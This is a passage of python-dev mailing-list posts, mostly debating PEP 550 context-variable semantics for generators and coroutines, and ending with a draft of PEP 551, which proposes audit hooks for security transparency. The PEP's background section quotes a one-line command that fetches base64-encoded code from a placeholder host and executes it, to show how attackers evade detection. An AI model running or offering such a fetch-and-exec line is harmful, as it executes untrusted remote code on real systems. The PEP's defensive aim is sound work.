contexts, numpy.errstate, and > warnings.catch_warnings. The decimal context works like this: 1) There is a default context template (user settable). 2) Whenever the first operation *in a new thread* occurs, the thread-local context is initialized with a copy of the template. I don't find it very intuitive if setcontext() is somewhat local in coroutines but they don't participate in some form of CLS. You have to think about things like "what happens in a fresh thread when a coroutine calls setcontext() before any other decimal operation has taken place". So perhaps Nathaniel is right that the PEP is not so useful for numpy and decimal backwards compat. Stefan Krah From yselivanov.ml at gmail.com Mon Aug 28 14:00:37 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 14:00:37 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170828173327.GA2671@bytereef.org> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> Message-ID: On Mon, Aug 28, 2017 at 1:33 PM, Stefan Krah wrote: [..] >> * Context managers like decimal contexts, numpy.errstate, and >> warnings.catch_warnings. > > The decimal context works like this: > > 1) There is a default context template (user settable). > > 2) Whenever the first operation *in a new thread* occurs, the > thread-local context is initialized with a copy of the > template. > > > I don't find it very intuitive if setcontext() is somewhat local in > coroutines but they don't participate in some form of CLS. 
> > You have to think about things like "what happens in a fresh thread > when a coroutine calls setcontext() before any other decimal operation > has taken place". I'm sorry, I don't follow you here. PEP 550 semantics: setcontext() in a regular code would set the context for the whole thread. setcontext() in a coroutine/generator/async generator would set the context for all the code it calls. > So perhaps Nathaniel is right that the PEP is not so useful for numpy > and decimal backwards compat. Nathaniel's argument is pretty weak as I see it. He argues that some people would take the following code: def bar(): # set decimal context def foo(): bar() # use the decimal context set in bar() and blindly convert it to async/await: async def bar(): # set decimal context async def foo(): await bar() # use the decimal context set in bar() And that it's a problem that it will stop working. But almost nobody converts the code by simply slapping async/await on top of it -- things don't work this way. It was never a goal for async/await or asyncio, or even trio/curio. Porting code to async/await almost always requires a thoughtful rewrite. In async/await, the above code is an *anti-pattern*. It's super fragile and can break by adding a timeout around "await bar". There's no workaround here. Asynchronous code is fundamentally non-local and a more complex topic on its own, with its own concepts: Asynchronous Tasks, timeouts, cancellation, etc. Fundamentally: "(synchronous code) != (asynchronous code) - (async/await)". Yury From guido at python.org Mon Aug 28 14:26:54 2017 From: guido at python.org (Guido van Rossum) Date: Mon, 28 Aug 2017 11:26:54 -0700 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: <1D692D69-B942-48D8-81FD-3240F43E432D@python.org> References: <1D692D69-B942-48D8-81FD-3240F43E432D@python.org> Message-ID: On Mon, Aug 28, 2017 at 9:26 AM, Barry Warsaw wrote: > On Aug 28, 2017, at 11:50, Yury Selivanov wrote: > > > For checking if a context variable has a value in the topmost LC, we > > can add two new keyword arguments to the "ContextVar.lookup()" method: > > > > ContextVar.lookup(*, default=None, topmost=False) > > > > If `topmost` is set to `True`, `lookup` will only check the topmost LC. > > > > For deleting a value from the topmost LC we can add a new > > "ContextVar.delete()" method. > > +1 > Yes, that's the only way. (Also forgive me for ever having proposed lookup() -- I think we should go back to get(), set(), delete(). Things will then be similar to getattr/setattr/delattr for class attributes. -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From breamoreboy at yahoo.co.uk Mon Aug 28 16:43:11 2017 From: breamoreboy at yahoo.co.uk (Mark Lawrence) Date: Mon, 28 Aug 2017 21:43:11 +0100 Subject: [Python-Dev] [bpo-30421]: Pull request review In-Reply-To: References: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com> Message-ID: On 28/08/2017 17:46, Terry Reedy wrote: > On 8/28/2017 3:42 AM, Robert Schindler wrote: >> Hello, >> >> In May, I submitted a pull request that extends the functionality of >> argparse.ArgumentParser. > > The argparse maintainer, bethard (Peter Bethard), was not added to the > nosy list.? And he does not seem to have been active lately -- his bpo > profile does not list a github name. > >> To do so, I followed the steps described in the developers guide. >> >> According to [1], I already pinged at GitHub but got no response. The >> next step seems to be writing to this list. 
>> >> I know that nobody is payed for reviewing submissions, but maybe it just >> got overlooked? >> >> You can find the pull request at [2]. > >> [1] https://docs.python.org/devguide/pullrequest.html#reviewing >> [2] https://github.com/python/cpython/pull/1698 > > Some core developer has to decide if the new feature should be added, > and if so, what the API should be.? If Peter is not doing that, I don't > know who will.? It is possible that the current design is intentional, > rather than an oversight.? It does not make too much sense to review the > implementation (the PR) until the design decisions are made.? In this > case, the PR adds a feature not discussed on the bpo issue. > The bulk of the work on argparse in recent years has been done by paul.j3. I have no idea whether or not he is classed as a core developer. -- My fellow Pythonistas, ask not what our language can do for you, ask what you can do for our language. Mark Lawrence --- This email has been checked for viruses by AVG. http://www.avg.com From yselivanov.ml at gmail.com Mon Aug 28 17:24:29 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 17:24:29 -0400 Subject: [Python-Dev] PEP 550 v4: coroutine policy Message-ID: Long story short, I think we need to rollback our last decision to prohibit context propagation up the call stack in coroutines. In PEP 550 v3 and earlier, the following snippet would work just fine: var = new_context_var() async def bar(): var.set(42) async def foo(): await bar() assert var.get() == 42 # with previous PEP 550 semantics run_until_complete(foo()) But it would break if a user wrapped "await bar()" with "wait_for()": var = new_context_var() async def bar(): var.set(42) async def foo(): await wait_for(bar(), 1) assert var.get() == 42 # AssertionError !!! run_until_complete(foo()) Therefore, in the current (v4) version of the PEP, we made all coroutines to have their own LC (just like generators), which makes both examples always raise an AssertionError. This makes it easier for async/await users to refactor their code: they simply cannot propagate EC changes up the call stack, hence any coroutine can be safely wrapped into a task. Nathaniel and Stefan Krah argued on the mailing list that this change in semantics makes the PEP harder to understand. Essentially, context changes propagate up the call stack for regular code, but not for asynchronous. For regular code the PEP behaves like TLS, but for asynchronous it behaves like dynamic scoping. IMO, on its own, this argument is not strong enough to rollback to the older PEP 550 semantics, but I think I've discovered a stronger one: asynchronous context managers. With the current version (v4) of the PEP, it's not possible to set context variables in __aenter__ and in @contextlib.asynccontextmanager: class Foo: async def __aenter__(self): context_var.set('aaa') # won't be visible outside of __aenter__ So I guess we have no other choice other than reverting this spec change for coroutines. The very first example in this email should start working again. This means that PEP 550 will have a caveat for async code: don't rely on context propagation up the call stack, unless you are writing __aenter__ and __aexit__ that are guaranteed to be called without being wrapped into a Task. BTW, on the topic of dynamic scoping. Context manager protocols (both sync and async) is the fundamental reason why we couldn't implement dynamic scoping in Python even if we wanted to. 
With a classical dynamic scoping in a functional language, __enter__ would have its own scope, which the code in the 'with' block would never be able to access. Thus I propose to stop associating PEP 550 concepts with (dynamic) scoping. Thanks, Yury From ericsnowcurrently at gmail.com Mon Aug 28 18:14:40 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Mon, 28 Aug 2017 16:14:40 -0600 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 3:09 PM, Nathaniel Smith wrote: > You might be interested in these notes I wrote to motivate why we need > a chain of namespaces, and why simple "async task locals" aren't > sufficient: > > https://github.com/njsmith/pep-550-notes/blob/master/dynamic-scope.ipynb Thanks, Nathaniel! That helped me understand the rationale, though I'm still unconvinced chained lookup is necessary for the stated goal of the PEP. (The rest of my reply is not specific to Nathaniel.) tl;dr Please: * make the chained lookup aspect of the proposal more explicit (and distinct) in the beginning sections of the PEP (or drop chained lookup). * explain why normal frames do not get to take advantage of chained lookup (or allow them to). -------------------- If I understood right, the problem is that we always want context vars resolved relative to the current frame and then to the caller's frame (and on up the call stack). For generators, "caller" means the frame that resumed the generator. Since we don't know what frame will resume the generator beforehand, we can't simply copy the current LC when a generator is created and bind it to the generator's frame. However, I'm still not convinced that's the semantics we need. The key statement is "and then to the caller's frame (and on up the call stack)", i.e. chained lookup. On the linked page Nathaniel explained the position (quite clearly, thank you) using sys.exc_info() as an example of async-local state. I posit that that example isn't particularly representative of what we actually need. Isn't the point of the PEP to provide an async-safe alternative to threading.local()? Any existing code using threading.local() would not expect any kind of chained lookup since threads don't have any. So introducing chained lookup in the PEP is unnecessary and consequently not ideal since it introduces significant complexity. As the PEP is currently written, chained lookup is a key part of the proposal, though it does not explicitly express this. I suppose this is where my confusion has been. At this point I think I understand one rationale for the chained lookup functionality; it takes advantage of the cooperative scheduling characteristics of generators, et al. Unlike with threads, a programmer can know the context under which a generator will be resumed. Thus it may be useful to the programmer to allow (or expect) the resumed generator to fall back to the calling context. However, given the extra complexity involved, is there enough evidence that such capability is sufficiently useful? Could chained lookup be addressed separately (in another PEP)? Also, wouldn't it be equally useful to support chained lookup for function calls? Programmers have the same level of knowledge about the context stack with function calls as with generators. I would expect evidence in favor of chained lookups for generators to also favor the same for normal function calls. 
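To make the distinction concrete, here is a runnable toy of what "chained
lookup" means when a generator is resumed (a stack of plain dicts stands
in for the EC here; this is an illustration, not the PEP's actual
machinery):

    # The last dict is the "topmost" logical context of whatever code
    # is currently running.
    stack = [{"v": "main"}]

    def lookup(name):
        for lc in reversed(stack):        # chained lookup: topmost LC first
            if name in lc:
                return lc[name]
        raise LookupError(name)

    def gen():
        yield lookup("v")                 # resolved at each *resume*
        yield lookup("v")

    g = gen()
    print(next(g))                        # 'main'  -- resumed under main
    stack.append({"v": "task2"})          # a different context resumes it
    print(next(g))                        # 'task2' -- falls back to resumer

Note that a simple "copy the LC when the generator is created" design
would print 'main' both times; chaining against the resumer is what makes
the second call print 'task2'.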
-eric From ericsnowcurrently at gmail.com Mon Aug 28 18:19:14 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Mon, 28 Aug 2017 16:19:14 -0600 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de> Message-ID: On Sat, Aug 26, 2017 at 10:31 AM, Yury Selivanov wrote: > On Sat, Aug 26, 2017 at 9:33 AM, Sven R. Kunze wrote: > [..] >> Why not the same interface as thread-local storage? This has been the >> question which bothered me from the beginning of PEP550. I don't understand >> what inventing a new way of access buys us here. > > This was covered at length in these threads: > > https://mail.python.org/pipermail/python-ideas/2017-August/046888.html > https://mail.python.org/pipermail/python-ideas/2017-August/046889.html FWIW, it would still be nice to have a simple replacement for the following under PEP 550: class Context(threading.local): ... Transitioning from there to PEP 550 is non-trivial. -eric From greg.ewing at canterbury.ac.nz Mon Aug 28 18:22:57 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Tue, 29 Aug 2017 10:22:57 +1200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> Message-ID: <59A497C1.1050005@canterbury.ac.nz> Yury Selivanov wrote: > On Mon, Aug 28, 2017 at 1:33 PM, Stefan Krah wrote: > [..] > >>>* Context managers like decimal contexts, numpy.errstate, and >>>warnings.catch_warnings. >> >>The decimal context works like this: >> >> 1) There is a default context template (user settable). >> >> 2) Whenever the first operation *in a new thread* occurs, the >> thread-local context is initialized with a copy of the >> template. >> >> >>I don't find it very intuitive if setcontext() is somewhat local in >>coroutines but they don't participate in some form of CLS. >> >>You have to think about things like "what happens in a fresh thread >>when a coroutine calls setcontext() before any other decimal operation >>has taken place". > > > I'm sorry, I don't follow you here. > > PEP 550 semantics: > > setcontext() in a regular code would set the context for the whole thread. > > setcontext() in a coroutine/generator/async generator would set the > context for all the code it calls. > > >>So perhaps Nathaniel is right that the PEP is not so useful for numpy >>and decimal backwards compat. > > > Nathaniel's argument is pretty weak as I see it. He argues that some > people would take the following code: > > def bar(): > # set decimal context > > def foo(): > bar() > # use the decimal context set in bar() > > and blindly convert it to async/await: > > async def bar(): > # set decimal context > > async def foo(): > await bar() > # use the decimal context set in bar() > > And that it's a problem that it will stop working. > > But almost nobody converts the code by simply slapping async/await on > top of it Maybe not, but it will also affect refactoring of code that is *already* using async/await, e.g. taking async def foobar(): # set decimal context # use the decimal context we just set and refactoring it as above. Given that one of the main motivations for yield-from (and subsequently async/await) was so that you *can* perform that kind of refactoring easily, that does indeed seem like a problem to me. It seems to me that individual generators/coroutines shouldn't automatically get a context of their own, they should have to explicitly ask for one. 
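For readers following along, the yield-from refactoring at stake can be
sketched like this (a toy: the "context" is just a module-level dict, so
under plain Python semantics the helper's change is visible to the
caller):

    ctx = {"prec": 28}              # toy stand-in for a decimal-like context

    def set_prec(p):
        ctx["prec"] = p             # helper factored out of foobar()
        yield from ()               # makes the helper itself a generator

    def foobar():
        yield from set_prec(1)      # should act like an inlined call
        yield ctx["prec"]

    print(list(foobar()))           # [1] with a plain dict

    # If ctx were a PEP 550 context variable under the v4 semantics, the
    # change made in set_prec() would stay in the helper's own LC and
    # foobar() would still see 28 -- which is exactly the disagreement.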
--
Greg

> -- things don't work this way. It was never a goal for
> async/await or asyncio, or even trio/curio. Porting code to
> async/await almost always requires a thoughtful rewrite.
>
> In async/await, the above code is an *anti-pattern*. It's super
> fragile and can break by adding a timeout around "await bar". There's
> no workaround here.
>
> Asynchronous code is fundamentally non-local and a more complex topic
> on its own, with its own concepts: Asynchronous Tasks, timeouts,
> cancellation, etc. Fundamentally: "(synchronous code) !=
> (asynchronous code) - (async/await)".
>
> Yury
> _______________________________________________
> Python-Dev mailing list
> Python-Dev at python.org
> https://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: https://mail.python.org/mailman/options/python-dev/greg.ewing%40canterbury.ac.nz

From yselivanov.ml at gmail.com  Mon Aug 28 18:37:45 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Mon, 28 Aug 2017 18:37:45 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A497C1.1050005@canterbury.ac.nz>
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz>
Message-ID: 

On Mon, Aug 28, 2017 at 6:22 PM, Greg Ewing wrote:
[..]
>> But almost nobody converts the code by simply slapping async/await on
>> top of it
>
> Maybe not, but it will also affect refactoring of code
> that is *already* using async/await, e.g. taking
>
>     async def foobar():
>         # set decimal context
>         # use the decimal context we just set
>
> and refactoring it as above.

There's no code that already uses async/await and decimal context
managers/setters. Any such code is broken right now, because decimal
context set in one coroutine affects them all. Your example would work
only if foobar() is the only coroutine in your program.

>
> Given that one of the main motivations for yield-from
> (and subsequently async/await) was so that you *can*
> perform that kind of refactoring easily, that does
> indeed seem like a problem to me.

With the current PEP 550 semantics w.r.t. generators you still can
refactor them. The following code would work as expected:

    def nested_gen():
        # use some_context

    def gen():
        with some_context():
            yield from nested_gen()

    list(gen())

I'm saying that the following should not work:

    def nested_gen():
        set_some_context()
        yield

    def gen():
        # some_context is not set
        yield from nested_gen()
        # use some_context ???

    list(gen())

IOW, any context set in generators should not leak to the caller,
ever. This is the whole point of the PEP.

As for async/await, see this:
https://mail.python.org/pipermail/python-dev/2017-August/149022.html

Yury

From yselivanov.ml at gmail.com  Mon Aug 28 18:40:05 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Mon, 28 Aug 2017 18:40:05 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: <59A0DAB4.2030807@stoneleaf.us> <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de>
Message-ID: 

On Mon, Aug 28, 2017 at 6:19 PM, Eric Snow wrote:
> On Sat, Aug 26, 2017 at 10:31 AM, Yury Selivanov wrote:
>> On Sat, Aug 26, 2017 at 9:33 AM, Sven R. Kunze wrote:
>> [..]
>>> Why not the same interface as thread-local storage? This has been the
>>> question which bothered me from the beginning of PEP550. I don't understand
>>> what inventing a new way of access buys us here.
>> This was covered at length in these threads:
>>
>> https://mail.python.org/pipermail/python-ideas/2017-August/046888.html
>> https://mail.python.org/pipermail/python-ideas/2017-August/046889.html
>
> FWIW, it would still be nice to have a simple replacement for the
> following under PEP 550:
>
>     class Context(threading.local):
>         ...
>
> Transitioning from there to PEP 550 is non-trivial.

And it should not be trivial, as the PEP 550 semantics are different
from TLS. Using PEP 550 instead of TLS should be carefully evaluated.
Please also see this:
https://www.python.org/dev/peps/pep-0550/#replication-of-threading-local-interface

Yury

From tjreedy at udel.edu  Mon Aug 28 18:47:20 2017
From: tjreedy at udel.edu (Terry Reedy)
Date: Mon, 28 Aug 2017 18:47:20 -0400
Subject: [Python-Dev] [bpo-30421]: Pull request review
In-Reply-To: 
References: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com>
Message-ID: 

On 8/28/2017 4:43 PM, Mark Lawrence via Python-Dev wrote:
> The bulk of the work on argparse in recent years has been done by
> paul.j3. I have no idea whether or not he is classed as a core developer.

'He' is a CLA-signed contributor, but not a committer, with no GitHub
name registered with bpo.

--
Terry Jan Reedy

From greg.ewing at canterbury.ac.nz  Mon Aug 28 18:56:00 2017
From: greg.ewing at canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 Aug 2017 10:56:00 +1200
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: 
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz>
Message-ID: <59A49F80.8070808@canterbury.ac.nz>

Yury Selivanov wrote:
> I'm saying that the following should not work:
>
>     def nested_gen():
>         set_some_context()
>         yield
>
>     def gen():
>         # some_context is not set
>         yield from nested_gen()
>         # use some_context ???

And I'm saying it *should* work, otherwise it breaks
one of the fundamental principles on which yield-from
is based, namely that 'yield from foo()' should behave
as far as possible as a generator equivalent of a
plain function call.

--
Greg

From yselivanov.ml at gmail.com  Mon Aug 28 19:16:33 2017
From: yselivanov.ml at gmail.com (Yury Selivanov)
Date: Mon, 28 Aug 2017 19:16:33 -0400
Subject: [Python-Dev] PEP 550 v4
In-Reply-To: <59A49F80.8070808@canterbury.ac.nz>
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz>
Message-ID: 

On Mon, Aug 28, 2017 at 6:56 PM, Greg Ewing wrote:
> Yury Selivanov wrote:
>>
>> I'm saying that the following should not work:
>>
>>     def nested_gen():
>>         set_some_context()
>>         yield
>>
>>     def gen():
>>         # some_context is not set
>>         yield from nested_gen()
>>         # use some_context ???
>
> And I'm saying it *should* work, otherwise it breaks
> one of the fundamental principles on which yield-from
> is based, namely that 'yield from foo()' should behave
> as far as possible as a generator equivalent of a
> plain function call.

Consider the following generator:

    def gen():
        with decimal.context(...):
            yield

We don't want gen's context to leak to the outer scope -- that's one
of the reasons why PEP 550 exists. Even if we do this:

    g = gen()
    next(g)
    # the decimal.context won't leak out of gen

So a Python user would have a mental model: context set in generators
doesn't leak.

Now let's consider a "broken" generator:

    def gen():
        decimal.context(...)
        yield

If we iterate gen() with next(), it still won't leak its context.
But if "yield from" has semantics that you want -- "yield from" to be just like function call -- then calling yield from gen() will corrupt the context of the caller. I simply want consistency. It's easier for everybody to say that generators never leaked their context changes to the outer scope, rather than saying that "generators can sometimes leak their context". Yury From steve.dower at python.org Mon Aug 28 19:55:19 2017 From: steve.dower at python.org (Steve Dower) Date: Mon, 28 Aug 2017 16:55:19 -0700 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime Message-ID: Hi python-dev, Those of you who were at the PyCon US language summit this year (or who saw the coverage at https://lwn.net/Articles/723823/) may recall that I talked briefly about the ways Python is used by attackers to gain and/or retain access to systems on local networks. I present here PEP 551, which proposes the core changes needed to CPython to allow sysadmins (or those responsible for defending their networks) to gain visibility into the behaviour of Python processes on their systems. It has already gone before security-sig, and has had a few significant enhancements as a result. There was also quite a positive reaction on Twitter after the first posting (I now have a significant number of infosec people watching what I do very carefully... :) ) Since the PEP should be self-describing, I'll leave context to its text. I believe it is ready for discussion, though there are three incomplete sections. Firstly, the list of audit locations is not yet complete, but is sufficient for the purposes of discussion (I expect to spend time at the upcoming dev sprints arguing about these in ridiculous detail). Second, the performance analysis has not yet been completed with sufficient robustness to make a concrete statement about its impact. Preliminary tests show negligible impact in the normal case, and the "opted-in" case is the user's responsibility. This also relies somewhat on the list of hooks being complete and the implementation having stabilised. Third, the section on recommendations is not settled. It is hard to recommend approaches in what is very much an evolving field, so I am constantly revising parts of this to keep it all restricted to those things enabled by or affected by this PEP. I am *not* trying to present a full guide on how to prevent attackers breaching your system :) My current implementation is available at: https://github.com/zooba/cpython/tree/sectrans The github rendered version of this file is at: https://github.com/python/peps/blob/master/pep-0551.rst (The one on python.org will update at some point, but is a little behind the version in the repo.) Cheers, Steve ----------------------------------------------------------------------------- PEP: 551 Title: Security transparency in the Python runtime Version: $Revision$ Last-Modified: $Date$ Author: Steve Dower Discussions-To: Status: Draft Type: Standards Track Content-Type: text/x-rst Created: 23-Aug-2017 Python-Version: 3.7 Post-History: 24-Aug-2017 (security-sig) Abstract ======== This PEP describes additions to the Python API and specific behaviors for the CPython implementation that make actions taken by the Python runtime visible to security and auditing tools. The goals in order of increasing importance are to prevent malicious use of Python, to detect and report on malicious use, and most importantly to detect attempts to bypass detection. 
Most of the responsibility for implementation is required from users, who
must customize and build Python for their own environment.

We propose two small sets of public APIs to enable users to reliably build
their copy of Python without having to modify the core runtime, protecting
future maintainability. We also discuss recommendations for users to help
them develop and configure their copy of Python.

Background
==========

Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent
threats (APTs). APTs are achieved when an attacker is able to penetrate a
network, establish their software on one or more machines, and over time
extract data or intelligence. Some APTs may make themselves known by
maliciously damaging data (e.g., `WannaCrypt `_) or hardware (e.g.,
`Stuxnet `_). Most attempt to hide their existence and avoid detection.
APTs often use a combination of traditional vulnerabilities, social
engineering, phishing (or spear-phishing), thorough network analysis, and
an understanding of misconfigured environments to establish themselves and
do their work.

The first infected machines may not be the final target and may not
require special privileges. For example, an APT that is established as a
non-administrative user on a developer's machine may have the ability to
spread to production machines through normal deployment channels. It is
common for APTs to persist on as many machines as possible, with sheer
weight of presence making them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their tracks,
the biggest barrier to detection is a lack of insight. System
administrators with large networks rely on distributed logs to understand
what their machines are doing, but logs are often filtered to show only
error conditions. APTs that are attempting to avoid detection will rarely
generate errors or abnormal events. Reviewing normal operation logs
involves a significant amount of effort, though work is underway by a
number of companies to enable automatic anomaly detection within
operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these
tools are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the
existence of APTs or methods and mitigations that do not apply to this
PEP. For further information about the field, we recommend reading or
watching the resources listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its
prevalence on server and developer machines, its ability to execute
arbitrary code provided as data (as opposed to native binaries), and its
complete lack of internal auditing. This allows attackers to download,
decrypt, and execute malicious code with a single command::

    python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64')).decode())"

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being written
to disk (base64 is often sufficient to bypass these checks).
It also bypasses protections such as file access control lists or
permissions (no file access occurs), approved application lists (assuming
Python has been approved for other uses), and automated auditing or
logging (assuming Python is allowed to access the internet or to access
another machine on the local network from which to obtain its payload).

General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often
detect attacks only after they have succeeded. This is known as the
"assume breach" mindset. [1]_ In this scenario, protections such as
sandboxing and input validation have already failed, and the important
task is detection, tracking, and eventual removal of the malicious code.

To this end, the primary feature required from Python is security
transparency: the ability to see what operations the Python runtime is
performing that may indicate anomalous or malicious use. Preventing such
use is valuable, but secondary to the need to know that it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which
events within a scripting engine are worth logging. However, given that
the value of many log events is not recognized until after an attack is
detected, it is important to capture as much as possible and filter views
rather than filtering at the source (see the No Easy Breach video from
`Further Reading`_). Events that are always of interest include attempts
to bypass auditing, attempts to load and execute code that is not
correctly signed or access-controlled, use of uncommon operating system
functionality such as debugging or inter-process inspection tools, most
network access and DNS resolution, and attempts to create and hide files
or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in
order to detect abnormal or malicious usage. Currently, the Python runtime
does not provide any ability to do this, which (anecdotally) has led to
organizations switching to other languages. The aim of this PEP is to
enable system administrators to deploy a security transparent copy of
Python that can integrate with their existing auditing and protection
systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* auditd [12]_
* SELinux labels [13]_
* check execute bit on imported modules

On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on
production machines is highly appealing to system administrators and will
make Python a more trustworthy dependency for application developers.

Overview of Changes
===================

True security transparency is not fully achievable by Python in isolation.
The runtime can audit as many events as it likes, but unless the logs are
reviewed and analyzed there is no value. Python may impose restrictions in
the name of security, but usability may suffer. Different platforms and
environments will require different implementations of certain security
features, and organizations with the resources to fully customize their
runtime should be encouraged to do so.

The aim of these changes is to enable system administrators to integrate
Python into their existing security systems, without dictating what those
systems look like or how they should behave.

We propose two API changes to enable this: an Audit Hook and Verified Open
Hook. Neither is set by default, and both require modifications to the
entry point binary to enable any functionality. For the purposes of
validation and example, we propose a new ``spython``/``spython.exe`` entry
point program that enables some basic functionality using these hooks.
**However, security-conscious organizations are expected to create their
own entry points to meet their own needs.**

Audit Hook
----------

In order to achieve security transparency, an API is required to raise
messages from within certain operations. These operations are typically
deep within the Python runtime or standard library, such as dynamic code
compilation, module imports, DNS resolution, or use of certain modules
such as ``ctypes``.

The new APIs required for audit hooks are::

    # Add an auditing hook
    sys.addaudithook(hook: Callable[str, tuple]) -> None
    int PySys_AddAuditHook(int (*hook)(const char *event, PyObject *args));

    # Raise an event with all auditing hooks
    sys.audit(str, *args) -> None
    int PySys_Audit(const char *event, PyObject *args);

    # Internal API used during Py_Finalize() - not publicly accessible
    void _Py_ClearAuditHooks(void);

Hooks are added by calling ``PySys_AddAuditHook()`` from C at any time,
including before ``Py_Initialize()``, or by calling ``sys.addaudithook()``
from Python code. Hooks are never removed or replaced, and existing hooks
have an opportunity to refuse to allow new hooks to be added (adding an
audit hook is audited, and so preexisting hooks can raise an exception to
block the new addition).

When events of interest are occurring, code can either call
``PySys_Audit()`` from C (while the GIL is held) or ``sys.audit()``. The
string argument is the name of the event, and the tuple contains
arguments. A given event name should have a fixed schema for arguments,
and both arguments are considered a public API (for a given x.y version of
Python), and thus should only change between feature releases with updated
documentation.

When an event is audited, each hook is called in the order it was added
with the event name and tuple. If any hook returns with an exception set,
later hooks are ignored and *in general* the Python runtime should
terminate. This is intentional to allow hook implementations to decide how
to respond to any particular event. The typical responses will be to log
the event, abort the operation with an exception, or to immediately
terminate the process with an operating system exit call.

When an event is audited but no hooks have been set, the ``audit()``
function should include minimal overhead. Ideally, each argument is a
reference to existing data rather than a value calculated just for the
auditing call.

As hooks may be Python objects, they need to be freed during
``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearAuditHooks()`` that releases
any ``PyObject*`` hooks that are held, as well as any heap memory used.
This is an internal function with no public export, but it triggers an
event for all audit hooks to ensure that unexpected calls are logged.

See `Audit Hook Locations`_ for proposed audit hook points and schemas,
and the `Recommendations`_ section for discussion on appropriate
responses.

Verified Open Hook
------------------

Most operating systems have a mechanism to distinguish between files that
can be executed and those that can not. For example, this may be an
execute bit in the permissions field, or a verified hash of the file
contents to detect potential code tampering. These are an important
security mechanism for preventing execution of data or code that is not
approved for a given environment. Currently, Python has no way to
integrate with these when launching scripts or importing modules.
Auditing hooks are the primary way to achieve security transparency, and are essential for detecting API Availability ---------------- While all the functions added here are considered public and stable API, the behavior of the functions is implementation specific. The descriptions here refer?to the CPython?implementation, and while other implementations should provide the functions, there is no requirement that they behave the same. For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but may do nothing. This allows code to make calls to ``sys.audit()`` without having to test for existence, but it should not assume that its call will have any effect. (Including existence tests in security-critical code allows another vector to bypass auditing, so it is preferable that the function always exist.) ``os.open_for_exec(pathlike)`` should at a minimum always return ``_io.open(pathlike, 'rb')``. Code using the function should make no further assumptions about what may occur, and implementations other than CPython are not required to let developers override the behavior of this function with a hook. Audit Hook Locations ==================== Calls to ``sys.audit()`` or ``PySys_Audit()`` will be added to the following operations with the schema in Table 1. Unless otherwise specified, the ability for audit hooks to abort any listed operation should be considered part of the rationale for including the hook. .. csv-table:: Table 1: Audit Hooks :header: "API Function", "Event Name", "Arguments", "Rationale" :widths: 2, 2, 3, 6 ``PySys_AddAuditHook``, ``sys.addaudithook``, "", "Detect when new audit hooks are being added." ``_PySys_ClearAuditHooks``, ``sys._clearaudithooks``, "", "Notifies hooks they are being cleaned up, mainly in case the event is triggered unexpectedly. This event cannot be aborted." ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detects any attempt to set the ``open_for_execute`` handler." "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``, ``PyAST_obj2mod`` ", ``compile``, "``(code, filename_or_none)``", "Detect dynamic code compilation, where ``code`` could be a string or AST. Note that this will be called for regular imports of source code, including those that were opened with ``open_for_exec``." "``exec``, ``eval``, ``run_mod``", ``exec``, 